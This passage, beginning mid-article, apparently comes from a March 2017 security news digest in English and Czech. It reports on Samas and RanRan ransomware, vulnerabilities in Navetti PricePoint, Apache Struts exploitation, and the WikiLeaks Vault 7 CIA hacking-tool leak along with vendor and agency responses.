“Now the worm comes in: Samas infects one computer, and then self-propagates through the network, infecting each and every endpoint and server until the whole corporation is locked down,” Javelin Networks says. Depending on the targeted organization and the industry it is part of, this can have dramatic consequences.
The researchers also point out that every organization using Active Directory can fall victim to such attacks. “This is why Active Directory reconnaissance is so powerful and effective—an attacker can learn everything about the environment by simply querying the AD,” they say.
According to Javelin Networks’ report, Samas has been mainly focused on organizations in the United States over the past year, but that entities in Europe and Asia were also targeted.
Several Flaws Found in Navetti Pricing Product
9.3.2017 securityweek Vulnerebility
Researchers at SEC Consult have discovered several potentially serious vulnerabilities in a popular pricing solution from Sweden-based company Navetti. The vendor has released a software update that patches the flaws.
Navetti PricePoint is a piece of software designed for controlling, managing and measuring all aspects of an organization’s pricing. According to the company, its product is used by several major organizations, including ABB, Husqvarna, Scania and Electrolux.
SEC Consult has conducted a quick security check of the Navetti PricePoint product and identified four types of vulnerabilities, including SQL injection, stored and reflected cross-site scripting (XSS), and cross-site request forgery (CSRF).
The security firm told SecurityWeek that the software is often accessible from the Internet, allowing attackers to remotely exploit all the vulnerabilities.
The SQL injection flaw affects search functionality, and it allows a low-privileged attacker to inject arbitrary SQL commands and gain access to the content of the application database.
The stored XSS vulnerabilities allow low-privileged users to inject malicious JavaScript payloads persistently into the application. The security holes can also be exploited to gain elevated privileges to the application by creating a new superuser account or adding the attacker’s account to the superuser group.
Both the SQL injection and stored XSS vulnerabilities require authentication, but SEC Consult said even the lowest access rights are sufficient.
The CSRF vulnerability, caused by the lack of CSRF tokens or nonces, can be exploited by getting the targeted user to access a specially crafted web page. An attacker can leverage the flaw to perform various actions on behalf of the victim, including to add or delete users, change user privileges, and modify application settings.
The reflected XSS bugs affect the filename fields of file upload dialog boxes and the code used to generate error messages within the PricePoint application. These flaws can be exploited by getting the targeted user to click on a malicious link.
The vulnerabilities were reported to Navetti in late July 2016 and they were patched on October 1 with the release of PricePoint 4.7.0.0. The vendor told SEC Consult that this version also brings other security improvements to its product.
Apple, Google Say Users Protected Against CIA Exploits
9.3.2017 securityweek BigBrothers
Apple and Google are confident that a majority of the vulnerabilities disclosed by WikiLeaks as part of the “Vault 7” release, which focuses on the hacking tools allegedly used by the U.S. Central Intelligence Agency (CIA), do not affect the latest versions of their products.
Microsoft is investigating the leaked documents, but it has yet to provide any specific information. Apple, on the other hand, said its initial analysis indicated that many of the issues mentioned in the Vault 7 leaks are patched in the latest version of its iOS operating system, and pointed out that nearly 80 percent of its customers are running the latest release.
Nevertheless, the company has promised to continue working on quickly addressing any identified flaws.
Google’s analysis is also ongoing, but the tech giant says it’s confident that the security updates and protections in Chrome and the Android operating system can shield users against many of the exploits.
The files released by WikiLeaks indicate that the CIA has had the tools and capabilities needed to hack any type of system, including mobile devices, desktop computers, networking equipment, and Internet of Things (IoT) devices.
Vulnerabilities affecting operating systems such as Android and iOS could have a critical impact as they can allow attackers to gain complete control of a device and access sensitive user information. Hackers can even obtain messages exchanged via secure applications such as Signal and Telegram without having to break their encryption.
Security firms have scrambled to assess the impact of the CIA hacking tools, but so far there is no evidence that the intelligence agency’s exploits are very sophisticated. A majority of the disclosed vulnerabilities have either been patched a long time ago, or they are considered low severity.
However, WikiLeaks has not released any of the actual exploits, making it difficult for vendors to assess the real impact. The whistleblower organization has considered providing more details to tech companies in order to allow them to fix the vulnerabilities faster.
The CIA has not commented on the authenticity of the leaked documents, but it pointed out that its mission is to collect foreign intelligence overseas in an effort to protect the U.S. from adversaries such as terrorists and hostile nation states. The CIA also noted that it is legally prohibited from spying on individuals in the United States. The agency accused WikiLeaks of jeopardizing U.S. personnel and operations.
CIA Responds to WikiLeaks Hacking Tool Dump
9.3.2017 securityweek BigBrothers
CIA: We Are Innovative but We Don’t Spy on Fellow Americans
The U.S. Central Intelligence Agency (CIA) has issued a statement in response to the claims made by WikiLeaks in regards to the agency’s hacking tools, and denied conducting electronic surveillance on Americans.
The CIA and the FBI have launched an investigation into the Vault 7 dump and unnamed U.S. officials told Reuters that the most likely source of the breach is a CIA contractor.
In its initial press release, WikiLeaks said the files, originating from the CIA’s Center for Cyber Intelligence (CCI) in Langley, Virginia, had been circulating among former government hackers and contractors. One of them allegedly provided the data to the whistleblower organization.
The CIA has refused to comment on the authenticity of the leaked documents or the status of its investigation into this incident. However, the agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities in an effort to protect America from adversaries such as terrorists and hostile nation states.
“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” the CIA said in its statement.
The nature of the tools suggests that they are designed for targeted operations – rather than mass surveillance – and the CIA pointed out that it’s legally prohibited from spying on individuals in the United States. The agency said its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”
The organization has expressed concern about the impact of the Vault 7 dump on its operations.
“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.
WikiLeaks has claimed that the U.S. consulate in Frankfurt is used by the CIA as a covert base for hackers targeting Europe, the Middle East and Africa. Germany’s foreign ministry issued a statement saying that it takes such information very seriously and that it’s in touch with the U.S. on this matter.
According to Reuters, China also expressed concern after the WikiLeaks documents showed that the CIA may have targeted the devices of several Chinese companies, including Huawei and ZTE. The country once again claimed it opposes all forms of hacking and urged the U.S. to “stop listening in, monitoring, stealing secrets and internet hacking against China and other countries.”
London-based Privacy International has also issued a statement, saying that if the leaks are authentic, “they demonstrate what we’ve long been warning about government hacking powers — that they can be extremely intrusive, have enormous security implications, and are not sufficiently regulated.”
Technology companies whose products are listed in the Vault 7 leaks have launched investigations to assess the impact of the alleged CIA tools. Following an initial analysis of the available information – WikiLeaks has yet to make public any actual exploits – security firms and tech giants such as Apple and Google have determined that a majority of the vulnerabilities do not affect the latest versions of their products.
Middle East Governments Targeted With RanRan Ransomware
9.3.2017 securityweek Virus
Researchers at Palo Alto Networks have come across a new piece of ransomware that has been used in targeted attacks aimed at multiple government organizations in the Middle East. Instead of asking for money, the attackers behind this campaign instruct victims to make a political statement on their website.
The ransomware, dubbed “RanRan,” is designed to encrypt various types of files stored on the infected system, including documents, archives, images, executables, logs, databases, source code and video files. A .zXz extension is assigned to encrypted files and an HTML file containing instructions on how to recover the files is dropped onto the device.
Victims are told not to shut down their computer or run any antivirus program as this can lead to “accidental damage on files.” Unlike other ransomware, which typically ask for money, the threat group behind RanRan instructs victims to create a subdomain with a politically inflammatory name on their website.
Victims are also instructed to upload to this subdomain a file named “Ransomware.txt” with the text “Hacked!” and their email address.
“By performing these actions, the victim, a Middle Eastern government organization, has to generate a political statement against the leader of the country,” said Palo Alto Networks researchers. “It also forces the victim to publicly announce that they have been hacked by hosting the Ransomware.txt file.”
Palo Alto Networks has not named any of the targeted government organizations and it has not made links to known threat groups. However, the security firm did say that it had not found any connection between these attacks and the recent Shamoon 2 campaign.
According to researchers, the RanRan malware is not sophisticated and its developers have made some mistakes when implementing the file encryption mechanism, which appears to be based on publicly available source code.
“RanRan makes a number of mistakes when encryption occurs,” researchers said. “For one, they use a symmetric cipher (RC4) with a re-used key. Additionally, some files are encrypted, but the originals are not deleted. This is due to a number of reasons, one of which being that encryption is attempted against system files and other files that are opened by running processes.”
Palo Alto Networks said victims of this ransomware may be able to decrypt some of the files if certain conditions are met.
Apache Struts Vulnerability Exploited in the Wild
9.3.2017 securityweek Vulnerebility
A high severity remote code execution (RCE) vulnerability affecting the Apache Struts 2 framework has been exploited in the wild, warns Cisco’s Talos intelligence and research group.
The vulnerability, tracked as CVE-2017-5638, can be triggered when performing file uploads with the Jakarta Multipart parser. The security hole, caused due to improper handling of the Content-Type header, allows a remote, unauthenticated attacker to execute OS commands on the targeted system.
The flaw affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10, and it was addressed on March 6 with the release of versions 2.3.32 and 2.5.10.1.
Cisco Talos spotted the first exploitation attempts on March 7, shortly after someone published a proof-of-concept (PoC) exploit. According to researchers, a majority of the exploitation attempts leverage the publicly available PoC code.
Some of the attacks involve the execution of a simple Linux command, likely in an effort to determine if the targeted system is vulnerable. Researchers have observed the use of commands such as “whoami” and “ifconfig,” which allow attackers to see what user is running the service and gather information on the network configuration.
In more sophisticated attacks, threat actors stopped the Linux firewall, downloaded a malicious payload from a web server, and executed that payload. Cisco said the payloads included IRC bouncers, DoS bots, and the BillGates malware.
In other attacks, hackers also attempted to make the malware persistent by copying it to a benign folder from where it would get executed on system boot. These attacks also involved disabling the firewall service on boot.
“It is likely that the exploitation will continue in a wide scale since it is relatively trivial to exploit and there are clearly systems that are potentially vulnerable,” said Cisco’s Nick Biasini.
Biasini said many of the compromised websites have already taken steps to clean the infection. Users are advised to update their Apache Struts installations as soon as possible.
Qualys has also published a blog post and a security advisory for this vulnerability.
Wikileaks Vault7: CIA Umbrage team, the factory of false flag ops
9.3.2017 securityaffairs BigBrothers
Wikileaks Vault7 data leak – the Umbrage team was tasked by the Central Intelligence Agency for false flag hacking operations.
WikiLeaks has obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking tools and capabilities.Digging in the huge trove of files, it is possible to find information about the ability of the intelligence Agency in fingerprinting hacking techniques used by threat actors in the wild, both state and non-state actors.
The CIA has built a specific team of experts code-named as the Umbrage team under the Remote Development Branch inside the CIA’s Center for Cyber Intelligence.
“The CIA’s Remote Devices Branch‘s UMBRAGE group collects and maintains a substantial library of attack techniques ‘stolen’ from malware produced in other states including the Russian Federation.
With UMBRAGE and related projects the CIA cannot only increase its total number of attack types but also misdirect attribution by leaving behind the “fingerprints” of the groups that the attack techniques were stolen from.” states Wikileaks.
“UMBRAGE components cover keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques.”
The team maintains a library of techniques borrowed from in-the-wild malware. The team has multiple purposes, the knowledge of attack patterns, of course, could help the agencies in forensics investigations to rapidly attribute the action of attackers to a specific actor.
But there is also another explanation, the library could be easily included in the CIA’s projects to achieve the following goals:
To reduce the cost and time to develop hacking tools to use in the cyber operations.
To make harder the attribution of cyber attacks and causing others threat actors to be blamed for the agency’s false flag operations.
The documents confirm that the technique borrowed by Umbrage team was the wiping component used by the dreaded Shamoon malware, the malicious code that destroyed more than 30,000 computers at Saudi Aramco in 2012.
Since December, security experts observed a spike in the number of attacks linked to a new variant the malware, so-called Shamoon 2.
The first Shamoon variant abused a commercial digitally-signed driver called RawDisk developed by a company named Eldos.
The experts at the Umbrage team used the same technique implemented by the Shamoon malware. They devised a method to bypass the license check for the RawDisk driver and implemented the same disk wiping technique in an internal hacking tool dubbed Rebound.
Then when malware researchers were discovering a Rebound sample in some systems they identified it as a Shamoon variant instead of the CIA implant.
The UMBRAGE team has many other techniques and tools in its arsenal. The experts were able for example to reproduce a persistence technique borrowed from the HiKit rootkit.
The CIA hackers are able to implement the webcam capture feature used by the infamous DarkComet RAT and also sandbox evasion techniques borrowed from the Trojan Upclicker and the Nuclear Exploit Pack.
CIA Umbrage team
The Umbrage was also inspired by the code leaked in 2015 from the Italian surveillance company Hacking Team.
The CIA experts focused their efforts on the implementation of the set of implants used by the Hacking Team designed to hack Windows systems.
“If one is interested in using some implementations found in the source code, it should be considered a best practice to extract the desired pieces, and thoroughly review and test the extracted pieces,” is reported in the leaked files.
Unfortunately, many other intelligence agencies may have used a similar technique to deceive investigators.
CIA se podle WikiLeaks zaměřila i na český Avast
8.3.2017 Novinky/Bezpečnost BigBrother
Česká firma Avast figuruje v dokumentech zveřejněných v úterý serverem WikiLeaks jako jeden z prodejců bezpečnostního softwaru, na který se zaměřila americká Ústřední zpravodajská služba (CIA). Příslušná stránka je označená jako tajná, ale žádné další informace neobsahuje, napsala ve středu agentura Reuters.
Portál WikiLeaks zveřejnil kolem 8000 stran dokumentů o útočném programovém arzenálu CIA, s nímž největší americká výzvědná organizace může pronikat do mobilních telefonů, chytrých televizorů a dalších elektronických zařízení a využít je ke shromažďování informací.
Publikované dokumenty podle Reuters obsahují dostatek technických podrobností, aby bezpečnostní experti a prodejci ochranného softwaru pochopili, jak rozsáhlé bezpečnostní mezery existují. Poskytují ale málo detailů, které by mohly napomoci rychlé nápravě.
Desítky technologických firem musejí rychle rozšířit objem sdílených informací, aby uchránily uživatele svých zařízení před slíděním, píše Reuters. Opírá se o sdělení viceprezidenta společnosti Avast Sinana Erena, který vyzval tvůrce mobilního softwaru Apple a Google, aby poskytli antivirovým firmám přednostní přístup ke svým produktům a umožnili jim zjednat okamžitou opravu bezpečnostních mezer.
„Můžeme odvrátit útoky v reálném čase, pokud budeme moci nahlédnout do mobilního operačního systému,” řekl Eren, který sídlí v americkém Silicon Valley. „Pokud nám mobilní platformy neuzavřou přístup, budeme moci lépe zjistit, že se do mobilu dostali hackeři,” uvedl Eren.
Společnost Avast, založená v roce 2010, se zabývá tvorbou bezpečnostního softwaru a její antivirové programy chrání přes 230 milionů počítačů a mobilních zařízení ve světě.
Známý hacker iPhonů a PlayStationu 3 si objednal Teslu. Dostal ale varování, že hackování může znamenat vězení
8.3.2017 Živě.cz Hacking
Hackera George Hotze, který se proslavil hacknutím například herní konzole PlayStation 3 nebo prvního iPhonu pro použití s různými operátory, asi není nutné blíže představovat. Tentokrát o sobě nechal vědět ve spojení se společností Tesla a objednávkou elektromobilu.
Slavný hacker iPhonu a PlayStationu končí se startupem, který měl udělat z každého auta samořízené
George Hotz si totiž dle informací Electreku objednal nejnovější elektromobil Tesla Model S vybavený Autopilotem druhé generace, která už obsahuje veškeré senzory a systémy pro plně autonomní provoz, byť toho zatím není schopná a uživatelé si musí počkat na budoucí softwarovou aktualizaci.
Před oficiálním dodávkou byl ale dle jeho tvrzení kontaktován osobně přímo právníky Tesly, kteří ho upozornili, že krádež duševního vlastnictví je trestní čin. Týká se to především toho, pokud by Hotz prolomil ochranu Tesly a získal tak například záznamy z Autopilota a další údaje o systému.
Hotz totiž minulý rok oficiálně ukončil startup Comma.AI, který měl umožnit snadnou a levnou instalaci některých jednodušších autonomních funkcí pro vybraná vozidla, která je standardně nepodporují a výrobce je ani nenabízí. Vlastní startup ale z důvodu legislativních tlaků ukončil a softwarový projekt vyvíjí pod volnou licencí a názvem Open Pilot. Kromě podpory některých vozů Honda a Acura lze předpokládat, že chtěl přidat i Teslu.
Po tomto varování se ale George Hotz rozhodl objednávku raději zrušit. Uvidíme, jestli je to tedy jen na oko a v budoucnu se v rámci projektu „náhodou“ podpora Tesly s hacknutou verzí softwaru objeví.
CIA prý útočila na chytré televizory a nejspíše se vydávala i za Rusy
8.3.2017 Živě.cz BigBrother
Skupina Wikileaks zveřejnila obrovský balík dat
Popisují kybernetické útoky na různé cíle
Antivirové společnosti se ničemu nediví
Skupina Wikileaks včera vypustila do světa obrovský balík bezmála devíti tisíc webových stránek a příloh, které mají popisovat nejrůznější operace americké zpravodajské služby CIA a jejich partnerů z Evropy.
Wikileaks zveřejnilo údajné dokumenty CIA, které popisují hackerské operace
Média dokumenty zatím opatrně analyzují, takto rozsáhlý únik je totiž bezprecedentní a zdaleka převyšuje i aféru okolo NSA a Edwarda Snowdena.
Balík dokumentů, který Wikileaks nazvala Year Zero, má být přitom pouze první částí mnohem rozsáhlejší série pojmenované Vault 7. Year Zero každopádně popisuje kybernetické techniky z let 2013-2016, které CIA údajně používala k odposlechům a průnikům do cizích počítačových systémů.
Slovíčko údajně je přitom na místě, CIA a americké úřady totiž aféru zatím prakticky nekomentují, a tak neexistuje způsob, jak dokumenty verifikovat. Ostatně i Wikileaks samotnou někteří pozorovatelé podezírají, že je pouze nástrojem dalších zpravodajských agentur – třeba těch ruských.
Na CIA a NSA si může zahrát každý. Hackerské technologie jsou běžně dostupné
Ať už je ale autorem dokumentů kdokoliv, samy o sobě vypadají docela věrohodně, protože popisují postupy, které nejsou v mnoha případech nikterak neznámé. Může si s nimi pohrávat každý bezpečnostní specialista, kterému se dostala do rukou třeba linuxová distribuce Kali.
Kali Linux je vcelku běžný operační systém, jehož specialitou je ale balík penetračních nástrojů. Kali slouží k tomu, aby pomocí něj třeba správce sítě otestoval podnikovou infrastrukturu na všemožné známé kybernetické útoky. Kali Linux tedy umí zneužívat nejrůznějších zranitelností k tomu, aby na cílový počítač instaloval trojské koně, malware, zapojoval jej do botnetu, nahrával zvuk z mikrofonu na telefonu s Androidem a tak dále.
Stejně tak lze ale Kali pochopitelně i zneužít a namísto testování vlastního systému s ním útočit na libovolný cíl. Není to žádné sci-fi, a pokud bude cílový systém zranitelný, dokáže to po pár minutách studia dokumentace naprosto každý zkušenější majitel počítače.
Jak to prý funguje v nitru CIA
Nemělo by být tedy žádným překvapením, že stejných principiálních postupů využívají i nejrůznější zpravodajské služby. Ty mají ke všemu oproti běžnému geekovi jednu nezanedbatelnou výhodu – ekonomické prostředky. Prakticky neomezené prostředky.
Podle Wikileaks je to i případ americké CIA, jejíž ředitelství pro digitální inovace (DDI – Directorate of Digital innovation), má údajně lepší zázemí než celá NSA. A to především díky mocné sekci CCI (Center for Cyber Intelligence), pod kterou konečně spadá skupina EDG (Enigneering Development Group) a divize aplikovaného inženýrství AED.
Organizační struktura CIA podle Wikileaks
Zatímco vy si po ránu přečtete v práci pracovní poštu, inženýři z AED svodku o nejnovějších zranitelnostech Zero Day, které odhalila noční směna v Androidu, Windows, Applu aj. Zero Day jsou chyby, o kterých zatím nikdo neví včetně autora softwaru, takže je reverzní inženýr může použít třeba k vytvoření sofistikovaného viru.
Nejděravější software posledních let? Ne, Windows to nikdy nebyly
Problém spočívá v tom, že objevování podobných chyb je velmi náročná práce, takže na ně tu a tam narazí špičkový student s hromadou času a vidinou finanční odměny (mnohé velké firmy mají tzv. bounty programy, v rámci kterých za odhalování neznámých chyb platí tučné odměny), specializované týmy antivirových společností a velkých počítačových korporací (třeba tým Google Project Zero), anebo právě inženýr v podobné štědře financované agentuře.
V CIA ale nejsou žádní amatéři. Dobře si uvědomují, že když na základě takové zranitelnosti napíšou trojského koně, kterého pak budou moci nainstalovat na počítač sledované osoby, přeci jen po sobě zanechají stopy, kterých by si mohly všimnout zase antivirové a další bezpečnostní společnosti, jejichž inženýři dnem a nocí nedělají nic jiného, než analyzují každé podivné chování na internetu.
TOP10 nejděravějšího softwaru v letech 1999 až leden 2017 (cvedetails.com)
Mac OS X (1 679)
Linux kernel (1 564)
Firefox (1 437)
Chrome (1 370)
iOS (984)
Flash Player (973)
Debian (933)
Internet Explorer (825)
Ubuntu (797)
OpenSUSE (783)
Právě z tohoto důvodu CIA podle uniklých dokumentů spustila program Umbrage, což má být jakési síto na malware šířící se světem. Špičkoví hackeři CIA je zachytí a zneužijí po svém, namísto toho, aby psali zcela vlastní.
V čem spočívá hlavní výhoda? Nikoli v tom, že si agenti ušetří práci, ale proto, že po sobě zametou stopy. Představte si například situaci, kdy CIA s pomocí NSA a dalších federálních agentur zachytí nějaký sofistikovaný malware svých protivníků z Moskvy. Mohou jej pak použít po svém, a když jejich modifikaci zachytí na síti bezpečnostní specialisté, budou si myslet, že za útokem stojí pravděpodobně Rusko, protože stopy malwaru sahají kamsi na samotný východ Evropy.
Weeping Angel promění televizor ve štěnici
Dalším zajímavým příkladem schopností hackerů z Langley je operace s kódovým označením Weeping Angel. Uniklé dokumenty pocházejí z roku 2014, takže popisují útok na dnes již staré řady plazmových televizorů od Samsungu vybavených mikrofony a kamerou pro Skype.
CIA se soustředila na televizory od Samsungu. Ne snad, že by byly děravější než konkurence, ale mají největší podíl na trhu. Ačkoliv se popisovaný útok týká starších modelů, lze předpokládat že CIA/NSA/MI5 a další mají něco i na ty nejnovější modely.
CIA se podle Wikileaks podařilo přepnout televizor do tichého režimu (píše se o něm jako o „Fake-off mode“), kdy sice televizor vypadal jako vypnutý, ve skutečnosti ale zvesela nahrával skrze mikrofon a kameru vše, co se dělo v jeho okolí. Nutno podotknout, že k nahrání špionského malwaru byl třeba přístup k USB portu televizoru, takže strach z nějakého plošného monitoringu není na místě. Nebylo by to ani úlohou CIA jako spíše NSA. A ani NSA nemá prostředky k tomu, aby odposlouchávala dění v každém obývacím pokoji na planetě.
Weeping Angel ale nejspíše mohli agenti použít k cílenému odposlechu cíle, jako by mu do pokoje nainstalovali klasickou štěnici.
Fine Dining, aneb tady vyplňte žádanku a vám toho uličníka hackneme
CIA podle uniklých dokumentů v letech 2013-2016 pracovala nejméně na 500 podobných projektech. Nabízí se tedy otázka, jak jejich používání vypadalo v praxi. Vžijme se do role analytika, který potřebuje získat informace o svém cíli.
Budeme předpokládat, že on sám není žádný hacker, takže těžko otevře linuxový terminál a začne z hlavy zapisovat všemožné příkazy a skripty v Pythonu. Podle Wikileaks namísto toho použije Fine Dining.
Proměnili jsme prohlížeč v zombie a zapojili počítač do malého botnetu
Mělo by se jednat o jakýsi standardizovaný dotazník potřeb. Zpravodajský důstojník pomocí něj vyplní, co všechno potřebuje získat a operační (OSB – Operational Support Branch) navrhne nejlepší způsob, jak toho docílit třeba zrovna mixem nejrůznějších sofistikovaných útoků.
Odposlouchávali jsme podnikovou síť a šmírovali kolegy z Computeru
Zdá se tedy, že celý systém uvnitř CIA pracuje jako dobře promazaný stroj až na jednu drobnost. Pokud je toto všechno pravda, znamená to, že kdosi z nitra CIA vynesl bezprecedentní množství strukturovaných dat, čímž prokázal, že ačkoliv jedna z nejmocnějších amerických agentur disponuje optikou třeba těch českých prakticky neomezenými technickými i finančními prostředky, někdo ji docela úspěšně vykradl, což vše posouvá do trošku jiného světla.
Vytvořili jsme malware pro Android, ovládli telefon a odposlouchávali jej
Není to žádné překvapení, reagují antivirové společnosti
Bezpečnostní specialisté aktuální únik zároveň shodně komentují tak, že překvapení není na místě. CIA dělá přesně to, k čemu je určená a nepoužívá žádné techniky z oboru science fiction, ale postupy, které při znalosti softwarových chyb může zneužít naprosto každý – třeba pomocí zmíněné linuxové distribuce Kali nebo desítek a stovek samostatných penetračních nástrojů.
10 Things You Need To Know About 'Wikileaks CIA Leak'
8.3.2017 thehackernews BigBrothers
Yesterday WikiLeaks published thousands of documents revealing top CIA hacking secrets, including the agency's ability to break into iPhones, Android phones, smart TVs, and Microsoft, Mac and Linux operating systems.
It dubbed the first release as Vault 7.
Vault 7 is just the first part of leak series “Year Zero” that WikiLeaks will be releasing in coming days. Vault 7 is all about a covert global hacking operation being run by the US Central Intelligence Agency (CIA).
According to the whistleblower organization, the CIA did not inform the companies about the security issues of their products; instead held on to security bugs in software and devices, including iPhones, Android phones, and Samsung TVs, that millions of people around the world rely on.
One leaked document suggested that the CIA was even looking for tools to remotely control smart cars and trucks, allowing the agency to cause "accidents" which would effectively be "nearly undetectable assassinations."
While security experts, companies and non-profit organizations are still reviewing 8,761 documents released as Vault 7 archive, we are here with some relevant facts and points that you need to know.
Here's Everything You Need to Know About Vault 7:
WikiLeaks Exposes CIA's Mobile Hacking Secrets
Vault7 — CIA has an impressive list of ways to hack into your iOS, Android & Windows phones.
Vault 7 purportedly includes 8,761 documents and files that detail intelligence information on CIA-developed software intended to crack any Android smartphone or Apple iPhone, including some that could take full control of the devices.
In fact, Wikileaks alleges that the CIA has a sophisticated unit in its Mobile Development Branch that develops zero-day exploits and malware to "infest, control and exfiltrate data from iPhones and other Apple products running iOS, such as iPads."
Some of the attacks are powerful enough to allow an attacker to remotely take over the "kernel," the heart of the operating system that controls the smartphone operation, or to gain "root" access on the devices, giving the attacker access to information like geolocation, communications, contacts, and more.
These types of attacks would most likely be useful for targeted hacking, rather than mass surveillance.
The leaked documents also detail some specific attacks the agency can perform on certain smartphones models and operating systems, including recent versions of iOS and Android.
CIA Didn't Break Encryption Apps, Instead Bypassed It
Vault7 — CIA-made phone malware can read your private chats without breaking encryption.
In the hours since the documents were made available by WikiLeaks, a misconception was developed, making people believe the CIA "cracked" the encryption used by popular secure messaging software including Signal and WhatsApp.
WikiLeaks asserted that:
"These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloakman by hacking the "smart" phones that they run on and collecting audio and message traffic before encryption is applied."
This statement by WikiLeaks made most people think that the encryption used by end-to-end encrypted messaging clients such as Signal and WhatsApp has been broken.
No, it hasn't.
Instead, the CIA has tools to gain access to entire phones, which would of course "bypass" encrypted messaging apps because it fails all other security systems virtually on the phone, granting total remote access to the agency.
The WikiLeaks documents do not show any attack particular against Signal or WhatsApp, but rather the agency hijacks the entire phone and listens in before the applications encrypt and transmit information.
It’s like you are sitting in a train next to the target and reading his 2-way text conversation on his phone or laptop while he's still typing, this doesn't mean that the security of the app the target is using has any issue.
In that case, it also doesn't matter if the messages were encrypted in transit if you are already watching everything that happens on the device before any security measure comes into play.
But this also doesn't mean that this makes the issue lighter, as noted by NSA whistleblower Edward Snowden, "This incorrectly implies CIA hacked these apps/encryption. But the docs show iOS/Android are what got hacked—a much bigger problem."
CIA Develops Malware to targets Windows, Linux & MacOS
Vault7 — CIA also develops cross-platform malware to hack Windows, MacOS & Linux Computers
The Wikileaks CIA dump also includes information about the malware that can be used by the agency to hack, remotely spy on and control PCs running Windows, macOS, and Linux operating systems.
This apparently means that the CIA can bypass PGP email encryption and even Virtual Private Network (VPN) on your computer in a similar way. The agency can also see everything you are doing online, even if you are hiding it behind Tor Browser.
Again, this also does not mean that using PGP, VPNs, or Tor Browser is not safe or that the CIA can hack into these services.
But the agency's ability to hack into any OS to gain full control of any device — whether it’s a smartphone, a laptop, or a TV with a microphone — makes the CIA capable of bypassing any service spy on everything that happens on that device.
CIA Borrowed Codes from Public Malware Samples
Vault7 — CIA uses codes from publicly available #malware samples to build its own spyware.
Yes, in addition to the attacks purportedly developed by the CIA, the agency has adopted some of the code from other, public sources of malware. Well, that's what many does.
One of the documents mentions how the agency supposedly tweaks bits of code from known malware samples to develop its custom code and more targeted solutions.
"The UMBRAGE team maintains a library of application development techniques borrowed from in-the-wild malware," the WikiLeaks document reads. "The goal of this repository is to provide functional code snippets that can be rapidly combined into custom solutions."
Some of the exploits listed were discovered and released by security firms, hacker groups, independent researchers, and purchased, or otherwise acquired by the CIA from other intelligence agencies, such as the FBI, NSA, and GCHQ.
One borrowed exploit in "Data Destruction Components" includes a reference to Shamoon, a nasty malware that has the capability to steal data and then completely wipe out hard-drives.
Another acquired attack by the CIA is SwampMonkey, which allows the agency to get root privileges on undisclosed Android devices.
Persistence, another tool in the CIA arsenal, allows the agency to gain control over the target device whenever it boots up again.
CIA Used Malware-Laced Apps to Spy on Targets
Vault7 — Fine Dining Attack: CIA used #malware-laced apps to spy on its targets.
The leaked documents include a file, named "Fine Dining," which does not contain any list of zero-day exploits or vulnerabilities, but a collection of malware-laced applications.
Fine Dining is a highly versatile technique which can be configured for a broad range of deployment scenarios, as it is meant for situations where the CIA agent has to infect a computer physically.
CIA field agents store one or more of these infected applications -- depending upon their targets -- on a USB, which they insert in their target's system to run one of the applications to gather the data from the device.
Developed by OSB (Operational Support Branch), a division of the CIA's Center for Cyber Intelligence, Fine Dining includes modules that can be used to weaponize following applications:
VLC Player Portable
Irfanview
Chrome Portable
Opera Portable
Firefox Portable
ClamWin Portable
Kaspersky TDSS Killer Portable
McAfee Stinger Portable
Sophos Virus Removal
Thunderbird Portable
Opera Mail
Foxit Reader
LibreOffice Portable
Prezi
Babel Pad
Notepad++
Skype
Iperius Backup
Sandisk Secure Access
U3 Software
2048
LBreakout2
7-Zip Portable
Portable Linux CMD Prompt
The CIA's Desperation To Crack Apple's Encryption
Vault7 — CIA has desperately been working for years to break Apple's Encryption.
This is not the first time when the CIA has been caught targeting iOS devices. It was previously disclosed that the CIA was targeting Apple's iPhones and iPads, following the revelation of top-secret documents from the agency's internal wiki system in 2015 from the Snowden leaks.
The documents described that the CIA had been "targeting essential security keys used to encrypt data stored on Apple's devices" by using both "physical" and "non-invasive" techniques.
In addition to the CIA, the FBI hacking division Remote Operations Unit has also been working desperately to discover exploits in iPhones, one of the WikiLeaks documents indicates.
That could also be the reason behind the agency's effort to force Apple into developing a working exploit to hack into the iPhone belonging to one of the terrorists in the San Bernardino case.
Apple Says It Has Already Patched Most Flaws Documented in CIA Leak
Vault7 — Apple says it has already patched many iOS vulnerabilities revealed in CIA Leaks.
Besides vulnerabilities in Android and Samsung Smart TVs, the leaked documents detail 14 iOS exploits, describing how the agency uses these security issues to track users, monitor their communications, and even take complete control of their phones.
However, Apple is pushing back against claims that the CIA's stored bugs for its devices were effective.
According to Apple, many iOS exploits in the Wikileaks CIA document dump have already been patched in its latest iOS version, released in January, while Apple engineers continue to work to address any new vulnerabilities that were known to the CIA.
Here's the statement provided by an Apple spokesperson:
"Apple is deeply committed to safeguarding our customers’ privacy and security. The technology built into today’s iPhone represents the best data security available to consumers, and we’re constantly working to keep it that way. Our products and software are designed to quickly get security updates into the hands of our customers, with nearly 80 percent of users running the latest version of our operating system. While our initial analysis indicates that many of the issues leaked today were already patched in the latest iOS, we will continue work to rapidly address any identified vulnerabilities. We always urge customers to download the latest iOS to make sure they have the most recent security updates."
Hacking 'Anyone, Anywhere,' Thanks to Internet Of 'Insecure' Things
Vault7 — CIA can hack your Smart TV and other smart devices to spy on you.
Besides hundreds of exploits, zero-days, and hacking tools that targets a large number of software and services, Vault 7 also includes details about a surveillance technique — codenamed Weeping Angel — used by the CIA to infiltrate smart TVs.
Samsung smart TVs are found to be vulnerable to Weeping Angel hacks that place the TVs into a "Fake-Off" mode, in which the owner believes the TV is off when it is actually on, allowing the CIA to covertly record conversations "in the room and sending them over the Internet to a covert CIA server."
"Weeping Angel already hooks key presses from the remote (or TV goes to sleep) to cause the system to enter Fake-Off rather than Off," the leaked CIA document reads. "Since the implant is already hooking these events, the implant knows when the TV will be entering Fake-Off mode."
